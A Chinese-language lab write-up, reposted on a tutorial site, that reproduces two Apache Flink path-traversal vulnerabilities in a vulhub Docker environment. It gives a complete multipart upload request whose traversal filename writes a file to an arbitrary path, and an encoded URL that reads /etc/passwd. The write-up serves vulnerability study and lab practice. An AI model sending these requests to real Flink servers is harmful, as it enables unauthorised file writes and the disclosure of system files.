栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 前沿技术 > 大数据 > 大数据系统

vulhub漏洞复现十六

vulhub漏洞复现十六

前言

Apache Flink是一个框架和分布式处理引擎,用于对无界和有界数据流进行有状态计算。Flink设计为在所有常见的集群环境中运行,以内存速度和任何规模执行计算。

一、 CVE-2020-17518_Apache Flink Upload Path Traversal

漏洞原理

Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件写入本地文件系统上的任意位置。

环境搭建

靶场:192.168.4.10_ubuntu

Execute following commands to start a Apache Flink jobmanager 1.11.2:

#docker-compose up -d

After the Apache Flink is started, visit `http://your-ip:8081` to view the homepage.

漏洞利用

Use following request to upload a file to `/tmp/success`:

```

POST /jars/upload HTTP/1.1

Host: localhost:8081

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y

Content-Length: 187

------WebKitFormBoundaryoZ8meKnrrso89R6Y

Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"

success

------WebKitFormBoundaryoZ8meKnrrso89R6Y--

```

 

成功写入

 

二、 CVE-2020-17519_Apache Flink `jobmanager/logs` Path Traversal

漏洞原理

Apache Flink 1.11.0(以及1.11.1和1.11.2中发布的)中引入的一项更改允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统中的任何文件。

漏洞环境

Execute following commands to start a Apache Flink jobmanager 1.11.2:

#docker-compose up -d

漏洞利用

Disclose the `/etc/passwd`:

```

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

```

 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/719684.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号